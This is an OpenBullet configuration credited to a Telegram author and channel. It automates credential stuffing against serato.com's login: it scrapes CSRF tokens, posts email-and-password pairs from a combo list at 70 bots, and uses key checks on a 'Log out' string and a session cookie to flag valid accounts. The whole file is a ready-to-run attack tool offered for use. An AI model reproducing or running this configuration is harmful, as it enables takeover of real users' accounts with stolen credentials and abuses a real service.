[SETTINGS]
{
  "Name": "serato.com",
  "SuggestedBots": 70,
  "MaxCPM": 0,
  "LastModified": "2021-07-13T13:51:24.6590274+04:30",
  "AdditionalInfo": "Telegram Channel: https://t.me/OpenBulletChannel",
  "Author": "@Hogo_Victor",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": "Author Telegram Id:@Hogo_Victor",
      "VariableName": "",
      "Id": 2003571131
    }
  ],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Get REQUEST GET "https://id.serato.com/en/login?app_id=7e4d0911-d852-4089-9ac0-528ec79e95bd&continue=%2Fen%2Fauthorize%3Fapp_id%3D7e4d0911-d852-4089-9ac0-528ec79e95bd%26state%3D1df2729d-070e-43f2-86a4-f38cd854bd93%26redirect_uri%3Dhttps%253A%252F%252Fserato.com%252Fauth%252Fexchange%253Fcontinue%253D%25252F&flow_params=%5B%5D" 
  
  HEADER "Host: id.serato.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Referer: https://serato.com/" 
  HEADER "Dnt: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Te: trailers" 
  HEADER "Connection: close" 

#csrf_name PARSE "<SOURCE>" LR "csrf_name\" value=\"" "\"" -> VAR "csrf_name" 

#csrf_value PARSE "<SOURCE>" LR "csrf_value\" value=\"" "\"" -> VAR "csrf_value" 

#Get REQUEST GET "https://serato.com/auth/start?continue=%2F&flow_params=%5B%5D" 
  
  HEADER "Host: serato.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Referer: https://serato.com/" 
  HEADER "Dnt: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Te: trailers" 
  HEADER "Connection: close" 

#url PARSE "<ADDRESS>" LR "" "" -> VAR "url" 

#Get REQUEST GET "<url>" 
  
  HEADER "Host: id.serato.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Referer: https://serato.com/" 
  HEADER "Dnt: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Te: trailers" 
  HEADER "Connection: close" 

#url2 PARSE "<ADDRESS>" LR "" "" -> VAR "url2" 

#Login REQUEST POST "<url2>" EncodeContent=TRUE 
  CONTENT "csrf_name=<csrf_name>&csrf_value=<csrf_value>&device_id=65469838685d601ac853f8d67050df2f&email_address=<USER>&password=<PASS>&remember=on&login=Sign+in" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: id.serato.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Origin: https://id.serato.com" 
  HEADER "Dnt: 1" 
  HEADER "Referer: <url2>" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Te: trailers" 
  HEADER "Connection: close" 

KEYCHECK 
  KEYCHAIN Success AND 
    KEY "Log out" 
    KEY "<COOKIES(sso_production-1_r)>" Exists 
  KEYCHAIN Failure OR 
    KEY "Invalid email or password" 

#Telegram_Channel FUNCTION Constant "https://t.me/OpenBulletChannel" -> CAP "Telegram Channel" 

